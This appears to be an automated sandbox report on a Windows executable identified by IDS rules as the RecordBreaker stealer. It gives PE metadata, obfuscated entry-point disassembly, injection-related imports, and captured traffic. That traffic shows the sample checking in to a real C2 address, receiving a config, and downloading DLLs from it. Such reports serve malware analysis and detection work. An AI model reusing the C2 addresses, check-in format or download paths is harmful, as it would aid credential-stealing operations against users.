                                            SSDEEP:196608:7/g8R+IDD1B3y4PRdUydjcWtPtDLT6Rtlq:Dg8R+IXvi4PzjcWtPtfu3lq
                                            TLSH:0F7633BB22980151F5FCCC798637BDB573F20F334681A87864E9BEC43A235E1A526953
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............................]...........@..........................p......r2q...@...........................Q.O..
                                            Icon Hash:6862eee6b292c66e
                                            Entrypoint:0x9df1c4
                                            Entrypoint Section:.JFL
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x62B0BDF1 [Mon Jun 20 18:35:29 2022 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:6
                                            OS Version Minor:0
                                            File Version Major:6
                                            File Version Minor:0
                                            Subsystem Version Major:6
                                            Subsystem Version Minor:0
                                            Import Hash:f9d630ca8ef98b1b948a3b0c7d80a0b0
                                            Instruction
                                            push ecx
                                            push ebx
                                            pushfd
                                            mov ecx, 203C50E9h
                                            add cl, FFFFFFBAh
                                            mov ebx, 377C2790h
                                            test ch, cl
                                            bswap ecx
                                            push ebx
                                            mov ebx, ecx
                                            movzx bx, bx
                                            jnl 00007FF9DCC0D370h
                                            neg edx
                                            rol edx, 02h
                                            xor ebx, edx
                                            clc
                                            test ax, 000031A2h
                                            add edi, edx
                                            jmp 00007FF9DCAE7E38h
                                            mov edx, dword ptr [edi]
                                            clc
                                            mov eax, dword ptr [edi+04h]
                                            stc
                                            not cl
                                            mov cl, byte ptr [edi+08h]
                                            cmp ebp, edx
                                            add edi, 00000002h
                                            shld edx, eax, cl
                                            jmp 00007FF9DCA318E1h
                                            rcl edx, 6Bh
                                            mov edx, dword ptr [esi]
                                            cmp edx, esp
                                            cmp sp, 04E6h
                                            lea esi, dword ptr [esi+00000004h]
                                            clc
                                            test cx, 2E17h
                                            xor edx, ebx
                                            clc
                                            rol edx, 1
                                            bswap edx
                                            rol edx, 1
                                            not edx
                                            test si, ax
                                            jmp 00007FF9DD0ACF52h
                                            jmp ebp
                                            lea esp, dword ptr [esp+10h]
                                            call 00007FF9DCB03266h
                                            shr dl, cl
                                            jmp 00007FF9DD0814A4h
                                            dec edx
                                            bswap edx
                                            jmp 00007FF9DCA83278h
                                            bswap eax
                                            xor ebx, eax
                                            test eax, esi
                                            add ebp, eax
                                            jmp 00007FF9DCAD0E82h
                                            jmp 00007FF9DCB80A84h
                                            cmc
                                            lea esi, dword ptr [esi+00000006h]
                                            stc
                                            clc
                                            mov byte ptr [eax], dl
                                            sub edi, 00000004h
                                            sal ax, 0000h
                                            mov eax, dword ptr [edi]
                                            cmp bx, ax
                                            cmp si, 759Fh
                                            xor eax, ebx
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x51f5c40xc4f.JFL
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5c444c0x78.JFL
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb100000x69a9.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xb0f0000x604.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x4090000x1ec.>\A
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000xa6150x0False0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0xc0000x19ba0x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0xe0000x14c00x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .sI30x100000x3f85de0x0unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .>\A0x4090000x3700x400False0.4609375data3.3778654018918868IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .JFL0x40a0000x7046400x704800unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .reloc0xb0f0000x6040x800False0.4140625data3.517525720355359IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .rsrc0xb100000x69a90x6a00False0.5401680424528302data5.820434697356694IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountry
                                            RT_ICON0xb102b00x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                            RT_ICON0xb103d80x2e8dataEnglishUnited States
                                            RT_ICON0xb106c00x668dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 224, next used block 65281EnglishUnited States
                                            RT_ICON0xb10d280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                            RT_ICON0xb112900x8a8dataEnglishUnited States
                                            RT_ICON0xb11b380xea8dataEnglishUnited States
                                            RT_ICON0xb129e00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                            RT_ICON0xb12e480x10a8dataEnglishUnited States
                                            RT_ICON0xb13ef00x25a8dataEnglishUnited States
                                            RT_GROUP_ICON0xb164980x84dataEnglishUnited States
                                            RT_VERSION0xb1651c0x310dataEnglishUnited States
                                            RT_MANIFEST0xb1682c0x17dXML 1.0 document textEnglishUnited States
                                            DLLImport
                                            KERNEL32.dlllstrcpynA, GetUserDefaultLCID, GetSystemInfo, LocalFree, FreeLibrary, GetProcAddress, LoadLibraryW
                                            ADVAPI32.dllGetUserNameW
                                            KERNEL32.dllGetSystemTimeAsFileTime, GetModuleHandleA, CreateEventA, GetModuleFileNameW, TerminateProcess, GetCurrentProcess, CreateToolhelp32Snapshot, Thread32First, GetCurrentProcessId, GetCurrentThreadId, OpenThread, Thread32Next, CloseHandle, SuspendThread, ResumeThread, WriteProcessMemory, GetSystemInfo, VirtualAlloc, VirtualProtect, VirtualFree, GetProcessAffinityMask, SetProcessAffinityMask, GetCurrentThread, SetThreadAffinityMask, Sleep, LoadLibraryA, FreeLibrary, GetTickCount, SystemTimeToFileTime, FileTimeToSystemTime, GlobalFree, LocalAlloc, LocalFree, GetProcAddress, ExitProcess, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, GetModuleHandleW, LoadResource, MultiByteToWideChar, FindResourceExW, FindResourceExA, WideCharToMultiByte, GetThreadLocale, GetUserDefaultLCID, GetSystemDefaultLCID, EnumResourceNamesA, EnumResourceNamesW, EnumResourceLanguagesA, EnumResourceLanguagesW, EnumResourceTypesA, EnumResourceTypesW, CreateFileW, LoadLibraryW, GetLastError, FlushFileBuffers, WriteConsoleW, SetStdHandle, IsProcessorFeaturePresent, DecodePointer, GetCommandLineA, RaiseException, HeapFree, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, LCMapStringW, GetStringTypeW, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, GetStartupInfoW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, HeapDestroy, QueryPerformanceCounter, HeapSize, WriteFile, RtlUnwind, SetFilePointer, GetConsoleCP, GetConsoleMode, HeapReAlloc, VirtualQuery
                                            USER32.dllCharUpperBuffW
                                            KERNEL32.dllLocalAlloc, LocalFree, GetModuleFileNameW, ExitProcess, LoadLibraryA, GetModuleHandleA, GetProcAddress
                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States
                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            192.168.2.5185.62.56.11349758802036934 06/26/22-09:36:19.847678TCP2036934ET TROJAN Win32/RecordBreaker CnC Checkin4975880192.168.2.5185.62.56.113
                                            185.62.56.113192.168.2.580497582036955 06/26/22-09:36:19.915392TCP2036955ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response8049758185.62.56.113192.168.2.5
                                            192.168.2.5185.62.56.11349758802036882 06/26/22-09:36:19.847678TCP2036882ET TROJAN Generic Stealer Config Download Request4975880192.168.2.5185.62.56.113
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jun 26, 2022 09:36:19.804987907 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:19.846631050 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:19.846729040 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:19.847677946 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:19.889239073 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:19.915391922 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:19.915417910 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:19.915436983 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:19.915453911 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:19.915468931 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:19.915510893 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:19.915560007 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.041074038 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.088423967 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.088455915 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.088493109 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.088516951 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.088536978 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.088555098 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.088568926 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.088584900 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.088608027 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.088625908 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.088644028 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.088654995 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.088671923 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.088696957 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.127993107 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128026962 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128045082 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128065109 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128087997 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128110886 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128129959 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128149033 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128166914 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.128185987 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128202915 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128225088 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128247976 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128258944 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.128277063 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128287077 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.128310919 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128329039 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128346920 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.128355980 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128380060 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.128398895 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128411055 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.128424883 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128443956 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128452063 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.128468990 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.128495932 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.128530025 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.169363022 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169413090 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169436932 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169459105 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169482946 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169504881 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169523954 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.169548035 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169569969 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169588089 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.169605970 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169617891 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.169637918 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169650078 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.169672012 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169682980 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.169706106 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169722080 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.169739962 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169756889 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.169775009 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169800997 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.169815063 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.169826031 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169851065 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169867992 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.169884920 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169902086 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.169920921 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169930935 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.169953108 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.169970989 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.169986963 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.170003891 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.170022011 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.170032024 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.170053959 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.170073986 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.170090914 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.170113087 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.170125961 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.170136929 CEST4975880192.168.2.5185.62.56.113
                                            Jun 26, 2022 09:36:20.170157909 CEST8049758185.62.56.113192.168.2.5
                                            Jun 26, 2022 09:36:20.170177937 CEST4975880192.168.2.5185.62.56.113
                                            • 185.62.56.113
                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.549758185.62.56.11380C:\Users\user\Desktop\VASkmEQ4iU.exe
                                            TimestampkBytes transferredDirectionData
                                            Jun 26, 2022 09:36:19.847677946 CEST542OUTPOST / HTTP/1.1
                                            Accept: */*
                                            Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                            User-Agent: record
                                            Host: 185.62.56.113
                                            Content-Length: 95
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Data Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 61 6c 66 6f 6e 73 26 63 6f 6e 66 69 67 49 64 3d 64 66 36 33 65 37 39 32 63 39 31 35 32 32 37 39 39 33 34 61 61 33 37 31 34 64 62 63 30 36 63 31
                                            Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=df63e792c9152279934aa3714dbc06c1
                                            Jun 26, 2022 09:36:19.915391922 CEST550INHTTP/1.1 200 OK
                                            Server: nginx/1.14.0 (Ubuntu)
                                            Date: Sun, 26 Jun 2022 07:36:19 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Content-Length: 4999
                                            Connection: keep-alive
                                            Vary: Accept-Encoding
                                            Vary: Accept-Encoding
                                            Vary: Accept-Encoding
                                            Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                            Cross-Origin-Embedder-Policy: require-corp
                                            Cross-Origin-Opener-Policy: same-origin
                                            Cross-Origin-Resource-Policy: same-origin
                                            X-DNS-Prefetch-Control: off
                                            Expect-CT: max-age=0
                                            X-Frame-Options: SAMEORIGIN
                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                            X-Download-Options: noopen
                                            X-Content-Type-Options: nosniff
                                            Origin-Agent-Cluster: ?1
                                            X-Permitted-Cross-Domain-Policies: none
                                            Referrer-Policy: no-referrer
                                            X-XSS-Protection: 0
                                            ETag: W/"1387-Wgc7qToYKwanQHjbzmQXqH5y5+0"
                                            Data Raw: 6c 69 62 73 5f 6e 73 73 33 3a 68 74 74 70 3a 2f 2f 31 38 35 2e 36 32 2e 35 36 2e 31 31 33 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 6e 73 73 33 2e 64 6c 6c 0a 6c 69 62 73 5f 6d 73 76 63 70 31 34 30 3a 68 74 74 70 3a 2f 2f 31 38 35 2e 36 32 2e 35 36 2e 31 31 33 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 6d 73 76 63 70 31 34 30 2e 64 6c 6c 0a 6c 69 62 73 5f 76 63 72 75 6e 74 69 6d 65 31 34 30 3a 68 74 74 70 3a 2f 2f 31 38 35 2e 36 32 2e 35 36 2e 31 31 33 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 76 63 72 75 6e 74 69 6d 65 31 34 30 2e 64 6c 6c 0a 6c 69 62 73 5f 6d 6f 7a 67 6c 75 65 3a 68 74 74 70 3a 2f 2f 31 38 35 2e 36 32 2e 35 36 2e 31 31 33 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66
                                            Data Ascii: libs_nss3:http://185.62.56.113/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dlllibs_msvcp140:http://185.62.56.113/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dlllibs_vcruntime140:http://185.62.56.113/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dlllibs_mozglue:http://185.62.56.113/aN7jD0qO6kT5bK5bQ4eR8f
                                            Jun 26, 2022 09:36:20.041074038 CEST555OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1
                                            Content-Type: text/plain;
                                            User-Agent: record
                                            Host: 185.62.56.113
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jun 26, 2022 09:36:20.088423967 CEST557INHTTP/1.1 200 OK
                                            Server: nginx/1.14.0 (Ubuntu)
                                            Date: Sun, 26 Jun 2022 07:36:20 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 2042296
                                            Connection: keep-alive
                                            Last-Modified: Mon, 11 Apr 2022 14:39:48 GMT
                                            ETag: "62543db4-1f29b8"
                                            Accept-Ranges: bytes
                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 53 57 56 8b 5d 0c 8b 75 08 8b 7e 0c 85 ff 74 40 8b 0d 70 e0 1d 10 ff 15 00 30 1e 10 57 ff d1 83 c4 04 8b 7e 0c 31 c0 85 db 0f
                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL9b"!&`@A!\T@@xPhh\!@.texti `.rdata@@.dataN*@.00cfg0@@.rsrcx@@@.relochP@BUSWV]u~t@p0W~1
                                            Jun 26, 2022 09:36:22.561785936 CEST3230OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1
                                            Content-Type: text/plain;
                                            User-Agent: record
                                            Host: 185.62.56.113
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jun 26, 2022 09:36:22.617723942 CEST3231INHTTP/1.1 200 OK
                                            Server: nginx/1.14.0 (Ubuntu)
                                            Date: Sun, 26 Jun 2022 07:36:22 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 449280
                                            Connection: keep-alive
                                            Last-Modified: Mon, 11 Apr 2022 14:39:42 GMT
                                            ETag: "62543dae-6db00"
                                            Accept-Ranges: bytes
